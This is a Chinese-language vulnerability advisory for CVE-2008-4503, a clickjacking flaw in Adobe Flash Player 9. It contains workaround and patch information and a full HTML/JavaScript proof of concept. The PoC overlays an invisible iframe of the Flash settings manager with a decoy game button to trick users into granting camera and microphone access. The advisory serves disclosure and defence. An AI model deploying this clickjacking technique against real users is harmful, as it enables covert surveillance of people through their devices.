安全研究
安全漏洞
Adobe Flash Player点击劫持漏洞
发布日期:2008-10-07
更新日期:2008-10-09
受影响系统:
Adobe Flash Player 9.0.124.0描述:
BUGTRAQ ID: 31625
CVE(CAN) ID: CVE-2008-4503
Flash Player是一款非常流行的FLASH播放器。
Adobe Flash Player的设置管理器受点击劫持(Clickjack)漏洞的影响。如果用户受骗访问了恶意网页并点击了伪装的对话框的话,就可能允许攻击者在用户不知情的情况下访问摄像头或麦克风。
<*来源:Robert Hansen
链接:http://secunia.com/advisories/32163/
http://blog.guya.net/2008/10/07/malicious-camera-spying-using-clickjacking/
http://www.adobe.com/support/security/advisories/apsa08-08.html
https://www.redhat.com/support/errata/RHSA-2008-0945.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<title>Camera ClickJacking - The Game</title>
<head>
<style type="text/css">
#frm
{
opacity:0;
filter:alpha(opacity=0);
}
.click
{
cursor:pointer;
position:absolute;
z-index:10;
width:100px;
}
.header
{
font:bold 28px Arial;
color:#CC0000;
}
body
{
font-family:Arial;
line-height:1.2em;
}
</style>
<script type="text/javascript">
jack = [{ d: 1, cx: 575, cy: 430 }, { d: 1, a: "loadAndReload", cx: 368, cy: 428 }, { d: 300, cx: 364, cy: 474 }, { d: 300, a: "reloadAndLoad", cx: 299, cy: 409}];
//jack[n].d -> delay next jacking
$d = document;
clk = block = scr = tmr = lastAction = null;
delayed = false;
mill = 0;
startMoves = 6;
function initGame() {
clk = $d.getElementById("click");
clk.style.display = "";
intr = $d.getElementById("intro");
intr.style.display = "none";
block = $d.getElementById("block");
scr = $d.getElementById("score");
tmr = $d.getElementById("timmer");
curr = moves = 0;
jack[2].wait = true;
next();
resetButton();
if ("undefined" == typeof tInter) tInter = setInterval(timmer, 90);
}
function next() {
if (curr >= jack.length) {
initGame();
return;
}
var x, y;
var b = getRnd(0, 1);
//alert("lastAction: " + lastAction);
action(lastAction);
lastAction = null;
var j = jack[curr];
if (j.wait || delayed || b || moves < startMoves) {
x = getRnd(120, 430);
y = getRnd(140, 400);
} else {
x = j.cx;
y = j.cy;
lastAction = j.a;
curr++;
delayed = true;
setTimeout(function() { delayed = false; }, j.d);
}
moves++;
pos(x, y);
jacking = false;
score();
}
function pos(x, y) {
clk.style.left = x + "px";
clk.style.top = y + "px";
}
function mouseOver() {
if (!jacking && curr && parseInt(clk.style.left) == jack[curr-1].cx && parseInt(clk.style.top) == jack[curr-1].cy) {
jacking = true;
clk.style.zIndex = -10;
block.style.zIndex = -2;
setTimeout(btnClick, 500);
}
}
function btnClick() {
if (animCount > 0) return;
//resetButton();
inter = setInterval(anim, 20);
//alert(anim);
animCount = 0;
}
function resetButton() {
clk.style.width = 100;
clk.style.opacity = 1;
clk.style.filter = "progid:DXImageTransform.Microsoft.Alpha(opacity=100);";
clk.style.zIndex = 10;
block.style.zIndex = 2;
animCount = 0;
}
function action(s) {
switch (s) {
case "loadSWF":
var s = '<embed wmode="transparent" width="320" height="240" align="middle" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer" name="ClickJacking" quality="high" id="ClickJacking" src="ClickJacking.swf?131"/>';
var div = $d.getElementById("camera");
div.innerHTML = s;
break;
case "reloadFrm":
var frm = $d.getElementById("frm");
frm.src = frm.src.split('?')[0]; //+ "?r+" +getRnd(0, 1000000);
if(curr == 2)
setTimeout(function() { jack[2].wait = false; }, 5000);
break;
case "loadAndReload":
action("loadSWF");
setTimeout(function(){ action("reloadFrm");}, 1000 );
break;
case "reloadAndLoad":
action("reloadFrm");
setTimeout(function() { action("loadSWF"); }, 4000);
break;
}
}
function anim() {
if (animCount > 9) {
clearInterval(inter);
next();
resetButton();
return;
}
clk.style.width = (parseInt(clk.style.width) + 5) + "px";
clk.style.opacity -= 0.1;
clk.style.filter = "progid:DXImageTransform.Microsoft.Alpha(opacity=" + ((10 - animCount) * 10) + ");";
animCount++;
}
function getRnd(min, max) {
return Math.round(Math.random() * (max - min) + min);
}
function score() {
var s = scr.innerHTML;
var score = parseInt( s.substring(6));
scr.innerHTML = "Score: " + (++score);
}
function timmer() {
mill += 90;
tmr.innerHTML = "Time: " + (mill / 1000).toString().replace(".", ":");
}
function noCam() {
alert("no camera is connected, you'd better watch the captured demo");
}
function camJacked() {
var div = $d.getElementById("camera");
div.style.top = "145px";
div.style.left = "190px";
div.style.zIndex = 100;
clearInterval(tInter);
clk.style.display = "none";
}
function showHide() {
var frm = $d.getElementById("frm");
frm.style.opacity = this.checked ? "0.3" : "0";
frm.style.filter = "progid:DXImageTransform.Microsoft.Alpha(opacity=" + (this.checked ? "30" : "0") +");";
}
</script>
</head>
<body">
<!--<iframe id="frm" height="545" width="680" scrolling="no" src="http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html?defaultTab=privacy"></iframe>-->
<iframe id="frm" height="545" width="680" scrolling="no" src="http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager.html"></iframe>
<div style="position:absolute;top:10px;left:10px;z-index:200;"><b>Update:</b> This demo isn't functional anymore, you can still <a href="http://www.youtube.com/watch?v=gxyLbpldmuU" target="_blank">watch the video</a></div>
<div id="block" style="background:red;position:absolute;z-index:2;top:0;left:0;height:550px;width:700px;opacity:0;filter:alpha(opacity=0);"></div>
<div id="intro" style="position:absolute;top:0;left:0;z-index:3;height:400px;width:680px;padding:40px;text-align:center;">
<img src="cam.jpg" /><br />
<span class="header">Camera ClickJacking - The Game</span><br />
<img src="start.png" style="cursor:pointer;padding:10px;" onclick="initGame();" />
</div>
<div style="position:absolute;z-index:4;top:50px;left:80px;font-family:Arial;"><span id="score">Score: 0</span> <span id="timmer">Time: 00:00</span></div>
<img id="click" class="click" src="click.png" style="display:none;" onmouseover="mouseOver.call(this);" onclick="btnClick();"/>
<div id="camera" style="width:320px;height:240px;position:absolute;left:0;top:0;z-index:1;"></div>
<div><input id="showHide" type="checkbox" onclick="showHide.call(this);" /><label for="showHide">Show the jacked IFrame.</label><br />
This game demonstrate how the user's camera and microphone can be spied uppon without her knowing.<br />
You may feel free to try it if you have a webcam connected. This example won't listen or record any of the input.<br />
If you don't have a webcam connected, check out <a href="http://www.youtube.com/watch?v=gxyLbpldmuU" target="_blank">this video</a><br />
For more info: <a href="http://blog.guya.net">blog.guya.net</a><br />
</div>
</body>
</html>
建议:
临时解决方法:
* 如下更改Flash Player设置:
1 访问Adobe Flash Player设置管理器的全局保密性设置面板:http://www.adobe.com/support/documentation/en/flashplayer/help/settings_manager02.html
2 选择“始终拒绝”键。
3 在对话框中选择“确认”。
厂商补丁:
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2008:0945-01)以及相应补丁:
RHSA-2008:0945-01:Important: flash-plugin security update
链接:https://www.redhat.com/support/errata/RHSA-2008-0945.html
浏览次数:3880
严重程度:0(网友投票)
绿盟科技给您安全的保障